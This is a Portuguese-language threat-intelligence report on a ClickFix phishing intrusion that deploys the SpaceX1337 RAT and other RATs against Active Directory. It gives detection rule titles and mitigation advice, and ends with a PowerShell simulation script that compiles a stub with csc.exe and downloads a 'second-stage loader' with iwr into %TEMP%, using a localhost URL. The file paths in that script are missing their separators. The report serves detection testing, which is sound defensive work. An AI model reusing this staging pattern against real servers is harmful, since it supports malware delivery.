SOC Prime Bias: Critical

17 Aug 2026 07:03 UTC

SpaceX1337 ClickFix Leva a Comprometimento AD Direto

Author Photo
SOC Prime Team linkedin icon Seguir
SpaceX1337 ClickFix Leva a Comprometimento AD Direto
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Um adversário usou uma isca de phishing ClickFix para implantar o RAT SpaceX1337, seguido por uma infecção em várias etapas envolvendo RATs comuns como NetSupport, AsyncRAT e Remus. A invasão progrediu de roubo automatizado de credenciais para atividades interativas com operadores atuando diretamente com teclado, visando o Active Directory. O atacante tentou, por fim, movimento lateral em direção a um controlador de domínio e stuffing de credenciais contra um portal VPN.

Investigação

A invasão foi capturada dentro de uma honeynet Active Directory totalmente instrumentada, fornecendo visibilidade de ponta a ponta por meio de telemetria EDR, Zeek e Suricata. Os pesquisadores rastrearam a atividade desde o downloader inicial do PowerShell através de um amplo reconhecimento ADSI/LDAP e movimento lateral sobre SMB. A investigação identificou claramente a transição da execução automatizada de malware para a interação direta por um operador humano.

Mitigação

As organizações devem impor controles rigorosos de execução do PowerShell e monitorar relações entre processos parent-child suspeitas, incluindo explorer.exe iniciando PowerShell. As equipes de segurança devem detectar compilação local por meio de csc.exe e abuso de LOLBins como certutil or bitsadmin para downloads externos. O Active Directory também deve ser fortalecido removendo dados sensíveis dos atributos LDAP e monitorando consultas LDAP anômalas.

Resposta

Se uma atividade suspeita for detectada, os respondedores de incidentes devem isolar os endpoints afetados e revogar as credenciais de conta de serviço e administrador do domínio potencialmente comprometidas. As investigações devem priorizar a identificação de múltiplas famílias de RAT e verificar por tarefas agendadas não autorizadas ou modificações no registro. Os logs de VPN também devem ser revisados para tentativas de stuffing de credenciais originadas de infraestruturas maliciosas conhecidas.

Fluxo de Ataque

Detecções

Execução de Python a partir de Pastas Suspeitas (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Entrada RunMRU Suspeita Com Semântica LOLBin (via evento de registro)

Equipe SOC Prime
13 Ago 2026

Execução de comando em host remoto usando Windows Remote Management (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Possível Enumeração/Manipulação de Conta ou Grupo (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Descoberta de Confianças de Domínio Suspeitas (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Possível Descoberta de Configuração de Rede do Sistema (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Executável Suspeito Contendo Apenas Números no Nome (via linha de comando)

Equipe SOC Prime
13 Ago 2026

LOLBAS Schtasks (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Usando Certutil para Codificação de Dados e Operações de Certificado (via linha de comando)

Equipe SOC Prime
13 Ago 2026

LOLBAS Bitsadmin (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Possível Dumping SAM/SYSTEM/SECURITY (via linha de comando)

Equipe SOC Prime
13 Ago 2026

Chamar Métodos .NET Suspeitos do Powershell (via powershell)

Equipe SOC Prime
13 Ago 2026

Comunicação de Domínio Trycloudflare Suspeito (via DNS)

Equipe SOC Prime
13 Ago 2026

Tentativa de Comunicações de Consulta de IP Possível (via DNS)

Equipe SOC Prime
13 Ago 2026

IOCs (HashSha256) para detectar: De ClickFix SpaceX1337 a Ataque de AD com Interação Direta

Regras de AI do SOC Prime
13 Ago 2026

IOCs (HashMd5) para detectar: De ClickFix SpaceX1337 a Ataque de AD com Interação Direta

Regras de AI do SOC Prime
13 Ago 2026

IOCs (SourceIP) para detectar: De ClickFix SpaceX1337 a Ataque de AD com Interação Direta

Regras de AI do SOC Prime
13 Ago 2026

IOCs (DestinationIP) para detectar: De ClickFix SpaceX1337 a Ataque de AD com Interação Direta

Regras de AI do SOC Prime
13 Ago 2026

Regra Sigma de Alta Fidelidade para Comunicação SpaceX1337 e AdaptixC2 [Conexão de Rede Windows]

Regras de AI do SOC Prime
13 Ago 2026

Detecção de Compilação do AdaptixC2 Beacon e Carregador PowerShell [Criação de Processo Windows]

Regras de AI do SOC Prime
13 Ago 2026

Execução de Simulação

Pré-requisito: A verificação pré-voo de Telemetria & Base deve ter sido aprovada.

Racional: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa do Ataque & Comandos: Um adversário obteve acesso inicial via um link de phishing. Para evitar trazer um conhecido malicioso .exe para o disco, eles deixam cair um pequeno .cs arquivo fonte. Eles então invocam csc.exe para compilar este fonte em um executável funcional do Windows (svc.exe) localizado no diretório %TEMP% . Imediatamente após a compilação, o atacante usa PowerShell para buscar um carregador de segunda etapa de um servidor C2 remoto (simulado via um ouvinte local) usando o alias iwr (Invoke-WebRequest), salvando-o na pasta temp para completar o processo de staging.

  • Script de Teste de Regressão:

    # 1. Criar um arquivo fonte C# fictício para simular fonte do AdaptixC2
    $csFile = "$env:TEMPsvc.cs"
    $exeFile = "$env:TEMPsvc.exe"
    $sourceCode = @"
    using System;
    namespace MimicC2 {
        class Program {
            static void Main() { Console.WriteLine("Simulated Beacon"); }
        }
    }
    "@
    $sourceCode | Out-File -FilePath $csFile -Encoding ascii
    
    # 2. Simular a compilação com csc.exe (Aciona selection_csc)
    # Nota: Usamos as flags exatas especificadas na lógica de detecção
    Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait
    
    # 3. Simular o Download via PowerShell (Aciona selection_powershell)
    # Usamos 'iwr' e o caminho específico do OutFile para corresponder à lógica
    # Usando uma URL inexistente para evitar tráfego real na rede, mas a linha de comando corresponderá
    powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`""
  • Comandos de Limpeza:

    Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue